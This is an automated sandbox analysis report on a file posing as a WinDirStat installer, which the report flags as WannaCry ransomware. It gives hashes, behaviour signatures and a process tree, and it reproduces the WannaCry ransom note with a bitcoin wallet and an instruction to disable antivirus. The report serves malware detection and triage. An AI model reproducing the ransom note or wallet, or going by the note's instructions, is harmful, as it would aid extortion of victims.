Overview

overview

10

Static

static

1

windirstat...up.exe

windows10-2004-x64

10

Resubmissions

29-09-2022 16:35

220929-t3tn6sbde9 10

29-09-2022 16:26

220929-txh1gsbdd9 7

29-09-2022 16:22

220929-tvjt1acchl 7

Analysis

  • max time kernel
    2054s
  • max time network
    2099s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-09-2022 16:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    windirstat1_1_2_setup.exe

  • Size

    630KB

  • MD5

    3abf1c149873e25d4e266225fbf37cbf

  • SHA1

    6fa92dd2ca691c11dfbfc0a239e34369897a7fab

  • SHA256

    370a27a30ee57247faddeb1f99a83933247e07c8760a07ed82e451e1cb5e5cdd

  • SHA512

    b6d9672a580a02299bc370deb1fd99b5ca10ab86456385870cdae522c185ae51f8d390a7c50fcb5c7898523f52c834bb73515ffc6d0b0bcde210640e815ece9e

  • SSDEEP

    12288:yCjeMsiGVBKvjxTNlZaLlcMj+wXZvQpd9nP2+ZMU2tYspZcMwr/GNd35:yCjeTZa7BTsxewXZUTP2HU2yawjY5

Score
10/10
wannacrybootkitdiscoveryevasionpersistenceransomwarespywarestealertrojanworm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@Please_Read_Me@.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

    ransomwarewormwannacry
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 8 IoCs
  • Executes dropped EXE 64 IoCs
  • Sets service image path in registry 2 TTPs 6 IoCs
    persistence
  • Drops startup file 12 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks for any installed AV software in registry 1 TTPs 54 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 27 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 5 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 41 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\windirstat1_1_2_setup.exe
    "C:\Users\Admin\AppData\Local\Temp\windirstat1_1_2_setup.exe"
    1⤵
    • Loads dropped DLL
    PID:3140
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4488
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffdd4f4f50,0x7fffdd4f4f60,0x7fffdd4f4f70
      2⤵
        PID:3932
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1708 /prefetch:2
        2⤵
          PID:4052
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1944 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1828
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2304 /prefetch:8
          2⤵
            PID:1180
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
            2⤵
              PID:1044
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2888 /prefetch:1
              2⤵
                PID:4800
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
                2⤵
                  PID:2152
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:8
                  2⤵
                    PID:3384
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4556 /prefetch:8
                    2⤵
                      PID:2128
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4672 /prefetch:8
                      2⤵
                        PID:1592
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4464
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:8
                        2⤵
                          PID:1512
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4384
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4988 /prefetch:8
                          2⤵
                            PID:5036
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5020 /prefetch:8
                            2⤵
                              PID:1800
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:8
                              2⤵
                                PID:2088
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
                                2⤵
                                  PID:2836
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4680 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5260
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4984 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5360
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1152 /prefetch:8
                                  2⤵
                                    PID:5712
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1564 /prefetch:8
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5748
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4548 /prefetch:8
                                    2⤵
                                      PID:5900
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:8
                                      2⤵
                                        PID:6012
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 /prefetch:8
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:6080
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
                                        2⤵
                                          PID:1252
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
                                          2⤵
                                            PID:2128
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4720 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5188
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
                                            2⤵
                                              PID:5236
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3800 /prefetch:8
                                              2⤵
                                                PID:5332
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5620 /prefetch:8
                                                2⤵
                                                  PID:2096
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2508 /prefetch:2
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1492
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
                                                  2⤵
                                                    PID:1160
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:8
                                                    2⤵
                                                      PID:6044
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5288 /prefetch:8
                                                      2⤵
                                                        PID:6052
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2128 /prefetch:8
                                                        2⤵
                                                          PID:6064
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:8
                                                          2⤵
                                                            PID:4988
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4988 /prefetch:8
                                                            2⤵
                                                              PID:4912
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:8
                                                              2⤵
                                                                PID:6108
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4848 /prefetch:8
                                                                2⤵
                                                                  PID:1332
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
                                                                  2⤵
                                                                    PID:5548
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1940 /prefetch:8
                                                                    2⤵
                                                                      PID:4144
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:8
                                                                      2⤵
                                                                        PID:5172
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3520 /prefetch:8
                                                                        2⤵
                                                                          PID:4004
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:8
                                                                          2⤵
                                                                            PID:4268
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5172 /prefetch:8
                                                                            2⤵
                                                                              PID:4876
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3120 /prefetch:8
                                                                              2⤵
                                                                                PID:3328
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
                                                                                2⤵
                                                                                  PID:4552
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                                                                                  2⤵
                                                                                    PID:5868
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3208 /prefetch:8
                                                                                    2⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4432
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2496 /prefetch:8
                                                                                    2⤵
                                                                                      PID:3080
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2440 /prefetch:8
                                                                                      2⤵
                                                                                        PID:3544
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1092 /prefetch:1
                                                                                        2⤵
                                                                                          PID:1572
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
                                                                                          2⤵
                                                                                            PID:3736
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 /prefetch:8
                                                                                            2⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:5956
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9122340116522358007,18145774840241428157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5996 /prefetch:8
                                                                                            2⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:5928
                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                          1⤵
                                                                                            PID:1748
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc
                                                                                            1⤵
                                                                                              PID:4708
                                                                                            • C:\Windows\System32\FodHelper.exe
                                                                                              C:\Windows\System32\FodHelper.exe -Embedding
                                                                                              1⤵
                                                                                                PID:5568
                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
                                                                                                1⤵
                                                                                                • Drops file in Program Files directory
                                                                                                PID:6048
                                                                                                • C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir6048_1261917545\ChromeRecovery.exe
                                                                                                  "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir6048_1261917545\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={76d04682-e6a6-42ea-b063-ee85faef3d23} --system
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6100
                                                                                              • C:\Windows\system32\AUDIODG.EXE
                                                                                                C:\Windows\system32\AUDIODG.EXE 0x39c 0x4a8
                                                                                                1⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:5300
                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                1⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1800
                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                1⤵
                                                                                                  PID:3124
